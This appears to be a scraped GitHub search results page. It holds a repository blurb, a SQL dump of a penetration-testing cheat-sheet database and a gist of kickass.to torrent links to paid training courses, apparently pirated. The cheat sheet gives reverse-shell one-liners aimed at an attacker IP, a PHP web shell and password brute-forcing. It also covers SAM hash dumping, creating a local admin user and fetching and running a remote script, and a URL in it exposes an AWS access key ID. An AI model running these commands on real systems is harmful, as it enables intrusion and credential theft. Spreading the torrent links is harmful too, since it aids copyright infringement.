Found 226 repositories(showing 30)
screetsec
this script automatically install any package for pentest with uptodate tools , and lazy command for run the tools like lazynmap , install another and update to new #actually for lazy people hahaha #and Lalin is remake the lazykali with fixed bugs , added new features and uptodate tools . It's compatible with the latest release of Kali (Rolling)
Don-No7
-- -- File generated with SQLiteStudio v3.2.1 on Sun Feb 7 14:58:28 2021 -- -- Text encoding used: System -- PRAGMA foreign_keys = off; BEGIN TRANSACTION; -- Table: Commands CREATE TABLE Commands (Command_No INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, Name TEXT REFERENCES Programs (Name) NOT NULL, Description TEXT NOT NULL, Command TEXT, File BLOB); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (1, 'Kerbrute', 'brute single user password', 'kerbrute bruteuers [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (2, 'Kerbrute', 'brute username:password combos from file or stdin', 'kerbrute brutforce [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (3, 'Kerbrute', 'test a single password agains a list of users', 'kerbrute passwordspray [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (4, 'Kerbrute', 'Enumerate valid domain usernames via kerberos', 'kerbrute userenum [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (5, 'Name-That-Hash', 'Find the hash type of a string', 'nth --text ''<hash>''', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (6, 'Name-That-Hash', 'Find the hash type of a file', 'nth --file <hash file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (7, 'Nmap', 'scan for vulnerabilites', 'nmap --script vuln <HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (8, 'Nikto', 'Scan host for vulnerabilites', 'nikto -h <HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (9, 'SMBClient', 'check for misconfigured anonymous login', 'smbclient -L \\\\<HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (10, 'Hydra', 'Brutforce a webpage looking for usernames', 'hydra -l <user wordlist> -p 123 <HOST_IP> http-post-form ''/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=<output string on failure>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (11, 'SMBMap', 'enumerates SMB file shares', 'smbmap -u <user> -p <pass> -H <host IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (12, 'WPScan', 'Enumerate Wordpress website', 'wpscan --url <wp site> --enumerate --plugins-detection', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (13, 'WPScan', 'enumerate though known usernames', 'wpscan --url <HOST_IP> --usernames <USERNAME_FOUND> --passwords wordlist.dic', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (14, 'PowerShell', 'bypass execution policy', 'powershell.exe -exec bypass', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (15, 'TheHarvester', 'gathering informaiton from online sources', 'theharvester -d <domain> -l <#> -g -b google', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (16, 'Netcat', 'open a listener', 'nc -lvnp <port #>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (17, 'Netcat', 'Connect to computer', 'nc <attacker ip> <attacker port>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (18, 'GoBuster', 'Eunmerate directories on a website with a cookie', 'gobuster dir -u http://<IP> -w <wordlist> -x <extention> -c PHPSESSID=<cookie val>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (19, 'SQLMap', 'map sql at an IP', 'sqlmap -r <IP> --batch --force-ssl', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (20, 'John the Ripper', 'Use wordlist to parse hash', 'john <HASHES_FILE> --wordlist=<wordlist>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (21, 'John the Ripper', 'unencrypt shadow file', 'john <Unshadowed passwds>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (22, 'Unshadow', 'combine /etc/passwd and /etc/shadow file for cracking', 'unshadow <passwd> <shadow>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (23, 'Hashcat', 'crack hashes with a wordlist', 'hashcat -m <hash type> -a 0 -o <output file> <hash file> <wordlist> --force', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (26, 'Enum4Linux', 'basic command', 'enum4linux -a <IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (27, 'SMBClient', 'connect to a SMB share', 'smbclinet //<IP>/<share> -U <username>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (28, 'Netcat', 'connect with shell (-e doest always work)', 'nc -e /bin/sh <ATTACKING-IP> 80', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (29, 'Netcat', 'connect with shell (-e doest always work)', '/bin/sh | nc ATTACKING-IP 80', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (30, 'Netcat', 'done on the target', 'rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (31, 'SQLMap', 'Check form for SQL injection', 'sqlmap -o -u "http://meh.com/form/" –forms', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (32, 'SQLMap', 'automated SQL scan', 'sqlmap -u <URL> --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (33, 'CrackMapExec', 'run a mimikatz module', 'crackmapexec smb <target(s)> -u <username> -p <password> --local-auth -M mimikatz', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (34, 'CrackMapExec', 'Command execution', 'crackmapexec smb <target(s)> -u ''<username>'' -p ''<password>'' -x whoami', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (35, 'CrackMapExec', 'check logged in users', 'crackmapexec smb <target(s)> -u ''<username>'' -p ''<password>'' --lusers', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (36, 'CrackMapExec', 'dump local SAM hashes', 'crackmapexec <target(s)> -u ''<uesrname>'' -p ''<password>'' --local-auth --sam', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (37, 'CrackMapExec', 'null session login', 'crackmapexec smb <target(s)> -u '''' -p ''''', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (38, 'CrackMapExec', 'list modules', NULL, NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (39, 'CrackMapExec', 'pass the hash', NULL, NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (41, 'IKE-Scan', 'attack pre shared key with dictionary', 'psk-crack -d </path/to/dictionary> <psk file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (42, 'IKE-Scan', 'If you find a SonicWALL VPN using agressive mode it will require a group id, the default group id is GroupVPN', 'ike-scan <IP> -A -id GroupVPN', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (43, 'IKE-Scan', 'to find aggressive mode VPNs and save for use with psk-crack', 'ike-scan <IP> -A -P<file out>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (44, 'John the Ripper', 'crack passwords with korelogic rules', 'for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --rules:${ruleset} -w:<wordlist> <password_file> ; done', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (45, 'Nmap', 'create a list of ip addresses ', 'nmap -sL -n 192.168.1.1-100,102-254 | grep "report for" | cut -d " " -f 5 > ip_list_192.168.1.txt', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (46, 'Linux commands', 'mount NFS share on linux', 'mount -t nfs server:/share /mnt/point', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (47, 'PowerShell', 'create new user', 'net user <username> <password> /ADD', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (48, 'PowerShell', 'add user to a group (normaly Administrators)', 'net localgroup <group> <username> /ADD', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (49, 'PSK-Crack', 'brute force with specified length and specified chars (if left blank default is 36)', 'psk-crack -b <#> --charset="<charlist>" <key file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (50, 'PSK-Crack', 'dictianary attack', 'psk-crack -d <file> <key file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (51, 'SQLMap', 'check form for SQL injection', 'sqlmap -o -u "<url of form>" --forms', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (52, 'SQLMap', 'Scan url for union + error based injection with mysql backend and use a random user agent + database dump', 'sqlmap -u "<form URL>?id=1>" --dbms=mysql --tech=U --random-agent --dump ', NULL); -- Table: Exploits CREATE TABLE Exploits (Target TEXT, Type TEXT, Criteria TEXT, Method TEXT, Code TEXT, Result TEXT, Notes TEXT); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'Injection', 'ability to write to website folder', 'create or edit a mage of the website and insert the code to get remote access to the machine', '<? php system ($ _ GET [''cmd'']); ?>', 'execute code via url', '<URL of php>?cmd=<code to execue>'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', 'shell', 'enter code into the shell to find vulnerbilities int he machine', 'find / -perm -u=s -type f 2>/dev/null', 'SUID binaries', 'link output to GTFO bins and exploit'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Box', 'Priv Esc', 'Python binary running as root', 'generate a shell using python to grain root access', 'python3 -c "import pty;pty.spawn(''/bin/sh'');"', 'root shell', 'change pyton varibale acordingly'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('SQL', 'Priv Esc', 'MySQL binary running as root', 'enter into MySQL command line and break out into root y using the code', 'mysql> \! /bin/sh', 'get shell from root priv SQL', NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', 'low privilage shell', 'use the code to search for programs that run as sudo without password', 'sudo -l', NULL, 'list programs that can be used with sudo and no password'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Windows', 'Priv Esc', 'Powershell', 'use code to enumerate priv esc opertunities', 'wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """', 'list of unquoted service paths that might be used for priv esc', NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'LFI', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', NULL, 'use Linenum.sh to enumerate linux box', 'wget https://www.linenum.sh/ -P /dev/shm/Linenum.sh; chmod +x /dev/shm/linenum.sh ; ./dev/shm/Linenum.sh | tee /dev/shm/lininfo.txt', ' file, /dev/shm/lininfo.txt, with priv esc info', 'it is possible to use other methods of download like: curl or others found on google'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'No-Auth', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'Re-Registration', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'JWT', 'a site that uses jSON as cookies', 'edit the information (with BURP) thats going to the website to gain access without authenitaction', NULL, NULL, NULL); -- Table: Programs CREATE TABLE Programs (Name text PRIMARY KEY NOT NULL UNIQUE, Stage TEXT, Description text, Info text, Features TEXT, Target TEXT, Offensive BOOLEAN, commands TEXT); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Nmap', 'Enum', 'Used for scanning a network/host to gather more information', 'man pages on linux', 'Scanning', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('BURP Suit', 'Enum, Exploit', 'A program for manipulating HTTP requests, enumeration and Exploit', 'https://portswigger.net/burp/documentation/contents', 'Brute', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Metasploit', 'All', 'Powerfull swiss-army-knife of hacking', 'https://docs.rapid7.com/metasploit/', NULL, 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('MSFVenom', 'Exploit', 'Designed for creating payloads', 'https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom', 'Payloads', 'OS', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Snort', 'Utility', 'Packet sniffer', 'https://snort-org-site.s3.amazonaws.com/production/document_files/files/000/000/249/original/snort_manual.pdf?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIXACIED2SPMSC7GA%2F20210128%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20210128T192737Z&X-Amz-Expires=172800&X-Amz-SignedHeaders=host&X-Amz-Signature=4b51dc730677d14203c4a4cde25c1831ac64e9eca8df89c6737701811fa3f9fd', 'Sniffing', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('GoBuster', 'Enum', 'A fuzzer for websites', 'man pages on linux', 'Fuzzing', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hydra', 'Exploit', 'Brutforcer for wesite passwords', 'man pages on linux', 'Brute', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Mimikatz', 'Post', 'Used to exploit kerberos', 'https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Impacket', 'Exploit', 'The fascilitator of python bassed script that uses modules for attacking windows ', 'https://www.secureauth.com/labs-old/impacket/', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Enum4Linux', 'Enum', 'for Enumerating Windows and Samba hosts', 'man pages included, https://tools.kali.org/information-gathering/enum4linux', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Rubeus', 'Exploit', 'Used for kerberos interaction and abuse', 'https://github.com/GhostPack/Rubeus', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Kerbrute', 'Enum, Exploit', 'quickly enumerate and brutforce active directory accounts through kerberos pre-authentication', 'https://github.com/ropnop/kerbrute/', 'Brute', 'Windows', 'Y', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('John the Ripper', 'Exploit', 'a password brutforcer', 'https://www.openwall.com/john/doc/', 'Brute', 'Hash', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hashcat', 'Exploit', 'A password bruteforces', 'http://manpages.org/hashcat', 'Brute', 'Hash', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Bloodhound', 'Enum', 'Network mapping tool', 'https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux', NULL, 'N/A', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Wireshark', 'Utility', 'Packet sniffer', 'https://www.wireshark.org/download/docs/user-guide.pdf', 'Sniffing', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hash-Identifier', 'Utility', '(superseeded by Name-That-Hash)A simple python program for identifying hashes', 'man pages on linux', NULL, 'Hash', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Scp', 'Utility', 'For transfering files over SSH connection', 'man pages on llinux', 'Connect', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SMBClient', 'Utility', 'Used to connect to SMB file shares, can be used to enumerate shares', 'man pages on linux', 'Connect', 'SMB', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('PowerShell', 'Utility', 'Powerfull comand line for Windows', 'https://www.pdq.com/powershell/', NULL, 'Windows', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Searchsploit', 'Enum', 'Local version of ExploitDB', 'https://www.exploit-db.com/searchsploit', 'Exploit Enum', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Vim', 'Utiility', 'Text editor', 'https://vimhelp.org/', NULL, 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('LinPeas', 'Post', 'For Enumerating Linux computers', 'Simply run on a linux computer', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Nikto', 'Enum', 'For full enumeration on websites', 'https://cirt.net/nikto2-docs/', 'Exploit Enum', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Radare2', 'Utility', 'A tooll used to reverse engineer programs', 'https://github.com/radareorg/radare2/blob/master/doc/intro.md', 'Reverse', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Evil-WinRM', 'Exploit', 'Malware exuivilent of WinRM and used to exploit windows systems', 'https://github.com/Hackplayers/evil-winrm', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Seatbelt', 'Post', 'Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives', 'https://github.com/GhostPack/Seatbelt', 'Exploit Enum', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('WinPeas', 'Post', 'For full enumeration of windows host (internal)', 'https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS', 'Exploit Enum', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Lockless', 'Post', 'LockLess is a C# tool that allows for the enumeration of open file handles and the copying of locked files', 'https://github.com/GhostPack/Lockless', 'File interaction', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SQLMap', 'Exploit', 'Automates the process of detecting and exploiting SQL injection flaws and taking over of database servers', 'http://sqlmap.org/', 'SQLi', 'SQL', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('KEETheif', 'Post', 'Allows for the extraction of KeePass 2.X key material from memory, as well as the backdooring and enumeration of the KeePass trigger system', 'https://github.com/GhostPack/KeeThief', 'File interacction', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('TheHarvester', 'Enum', 'The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database', 'https://tools.kali.org/information-gathering/theharvester', NULL, 'N/A', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('jSQLInjection', 'Enum', 'used for gathering SQL databse information form a distant source', 'https://tools.kali.org/vulnerability-analysis/jsql', 'SQLi', 'SQL', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hping', 'Enum', 'Ping command on steroids, used to enumerating firewalls', 'https://tools.kali.org/information-gathering/hping3', 'Scanning', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Linux Exploit Suggester', 'Post', 'keeps track of vulnerabilities and suggests exploits to gain root access', 'https://tools.kali.org/exploitation-tools/linux-exploit-suggester', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Unix-PrivEsc-Check', 'Post', ' It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps, written in a single shell script so is easy to upload', 'https://tools.kali.org/vulnerability-analysis/unix-privesc-check', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Dotdotpwn', 'Enum', 'It’s a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as HTTP/FTP/TFTP servers', 'https://tools.kali.org/information-gathering/dotdotpwn', 'Fuzzing', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Websploit', 'Enum, Exploit', 'Swiss-army-knife of web exploits ranging from social engineering to honeypots and everything in between', 'https://tools.kali.org/web-applications/websploit', NULL, 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('XSSer', 'Enum', 'To detect, exploit and report XSS vulnerabilities in web-based applications', 'https://tools.kali.org/web-applications/xsser', 'Exploit enum', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Name-That-Hash', 'Utility', 'Hash-identifier with more deatils and command line based', 'https://github.com/HashPals/Name-That-Hash', NULL, 'N/A', 'N', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SMBMap', 'Enum', 'enumerate shares over a domin', 'https://tools.kali.org/information-gathering/smbmap', 'Scanning', 'OS', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Redis-Cli', 'Exploit', 'used for interacting and exploiting reddis-cli on port 6379', 'https://book.hacktricks.xyz/pentesting/6379-pentesting-redis ; https://redis.io/topics/rediscli', 'SQL', 'SQL', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Unshadow', 'POST', 'Combining passwd and shadow files into 1', 'simply use: unshadow <passwd file> <shadow file> > <output file>', 'Passwords', 'Hash', 'Y', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('WPScan', 'Enum', 'Look for vulnerabilities in wordpress site', 'https://github.com/wpscanteam/wpscan', 'Scanning', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Netcat', 'Utility', 'used for connecting 2 computers', 'https://www.win.tue.nl/~aeb/linux/hh/netcat_tutorial.pdf', 'Connect', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Linux commands', 'Post', 'Linux commands used for Priv esc', 'https://gtfobins.github.io, https://wadcoms.github.io', 'Priv Esc', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('CrackMapExec', 'Enum,, Exploit', 'Swis army knife of network testing', 'https://ptestmethod.readthedocs.io/en/latest/cme.html', 'Scanning, Exploit', 'Networks', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('IKE-Scan', 'Enum', 'Used to dicover, fingerprint and test IPsec VPN systems', 'http://www.nta-monitor.com/wiki/index.php/Ike-scan_User_Guide', 'Scanning', 'VPN', NULL, NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('PSK-Crack', 'Exploit', 'attempts to crack IKE Aggressive Mode pre-shared keys that have previously been gathered using ike-scan with the --pskcrack option', 'https://linux.die.net/man/1/psk-crack', 'Connect, Brute', 'Wifi', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('CeWL', 'Enum', 'spiders a given url returning a wordlist that is intednded for cracking passwords', 'https://tools.kali.org/password-attacks/cewl', 'Brute', 'Web', 'Y', NULL); COMMIT TRANSACTION; PRAGMA foreign_keys = on;
swati1024
Skip to content Search… All gists Back to GitHub Sign in Sign up Instantly share code, notes, and snippets. @giansalex giansalex/torrent-courses-download-list.md forked from M-Younus/torrent courses download-list Last active 2 days ago 15188 Code Revisions 15 Stars 151 Forks 88 <script src="https://gist.github.com/giansalex/4cd3631e94433bbbd71bf07aedb33a7b.js"></script> torrent-courses-download-list.md Torrent Courses List Download http://kickass.to/infiniteskills-learning-jquery-mobile-working-files-t7967156.html http://kickass.to/lynda-bootstrap-3-advanced-web-development-2013-eng-t8167587.html http://kickass.to/lynda-css-advanced-typographic-techniques-t7928210.html http://kickass.to/lynda-html5-projects-interactive-charts-2013-eng-t8167670.html http://kickass.to/vtc-html5-css3-responsive-web-design-course-t7922533.html http://kickass.to/10gen-m101js-mongodb-for-node-js-developers-2013-eng-t8165205.html http://kickass.to/cbt-nuggets-amazon-web-services-aws-foundations-t7839734.html http://kickass.to/cbt-nuggets-apache-hadoop-t8027965.html http://kickass.to/cbt-nuggets-backtrack-and-kali-linux-t7677281.html http://kickass.to/cbt-nuggets-ccda-desgn-640-864-t8300917.html http://kickass.to/cbt-nuggets-ccna-wireless-iuwne-640-722-t8300389.html http://kickass.to/cbt-nuggets-cisco-ccna-labs-cisco-for-the-real-world-bonus-t6154766.html http://kickass.to/cbt-nuggets-cisco-ccnp-security-firewall-v2-0-642-618-azazredhat-t6955696.html http://kickass.to/cbt-nuggets-cisco-ccnp-security-secure-642-637-azazredhat-t6955710.html http://kickass.to/cbt-nuggets-comptia-network-videos-2010-gurufuel-t4648514.html http://kickass.to/cbt-nuggets-definitive-guide-to-working-with-gns3-by-keith-bar-t8301349.html http://kickass.to/cbt-nuggets-ec-council-certified-ethical-hacker-v7-0-t6801120.html http://kickass.to/cbt-nuggets-exam-walkthrough-cisco-icnd1ccent-100-101-t8516719.html http://kickass.to/cbt-nuggets-exam-walkthrough-cisco-icnd2ccna-200-101-t8524803.html http://kickass.to/cbt-nuggets-linux-in-the-real-world-with-shawn-powers-t7718107.html http://kickass.to/cbt-nuggets-linux-series-video-tutorial-t485320.html http://kickass.to/cbt-nuggets-lpi-linux-lpic-1-101-and-comptia-linux-t8031864.html http://kickass.to/cbt-nuggets-lpi-linux-lpic-1-102-and-comptia-linux-t8031871.html http://kickass.to/cbt-nuggets-mastering-vmware-view-5-and-preparing-for-the-vcp510-dt-exam-t8301829.html http://kickass.to/cbt-nuggets-vmware-virtualization-vcp-vsphere-5-t8300512.html http://kickass.to/cbt-nuggets-wireshark-with-keith-barker-t8040855.html http://kickass.to/comptia-network-n10-005-collection-t8319928.html http://kickass.to/developing-in-html5-with-javascript-and-css3-jump-start-t8277565.html http://kickass.to/eli-the-computer-guy-linux-t8647714.html http://kickass.to/foundations-of-programming-test-driven-development-t7522376.html http://kickass.to/infiniteskills-advanced-html5-programming-t7463355.html http://kickass.to/infiniteskills-cisco-ccna-certification-bundle-2013-t7645010.html http://kickass.to/infiniteskills-css3-transformations-and-animations-t7930047.html http://kickass.to/infiniteskills-learning-javascript-programming-t7625039.html http://kickass.to/infiniteskills-learning-python-programming-t7107001.html http://kickass.to/infiniteskills-learning-regular-expressions-t8028765.html http://kickass.to/infiniteskills-learning-whitehat-hacking-and-penetration-testing-t8303725.html http://kickass.to/infiniteskills-microsoft-windows-server-2012-certification-training-exam-70-410-t7379360.html http://kickass.to/infiniteskills-php-security-t8046511.html http://kickass.to/learning-vmware-esxi-and-vsphere-5-1-administration-training-t8030885.html http://kickass.to/linuxcbt-basic-security-edition-d3x-t7650913.html http://kickass.to/linuxcbt-config-mgmt-edition-d3x-t7650929.html http://kickass.to/linuxcbthttpdxil-edition-d3x-t7653897.html http://kickass.to/linuxcbt-vbox-edition-d3x-t7653916.html http://kickass.to/linuxcbt-webscan-edition-d3x-t7653922.html http://kickass.to/linuxcbt-winpython-edition-d3x-t7653942.html http://kickass.to/linuxcbt-xenvm-edition-d3x-t7653948.html http://kickass.to/lynda-com-foundations-of-programming-code-efficiency-t8604312.html http://kickass.to/lynda-com-foundations-of-programming-databases-t8596357.html http://kickass.to/lynda-com-foundations-of-programming-design-patterns-t8692867.html http://kickass.to/lynda-com-foundations-of-programming-fundamentals-t7600288.html http://kickass.to/lynda-com-foundations-of-programming-web-services-including-exercise-files-torrenters-t7797117.html http://kickass.to/lynda-com-ruby-on-rails-4-essential-training-dec-2013-t8438392.html http://kickass.to/lynda-foundations-of-programming-refactoring-code-t7524343.html http://kickass.to/lynda-foundations-of-programming-software-quality-assurance-sum1-here-silverrg-t8043799.html http://kickass.to/lynda-javascript-events-t7893809.html http://kickass.to/lynda-leading-with-emotional-intelligence-t8157240.html http://kickass.to/lynda-management-tips-t8154761.html 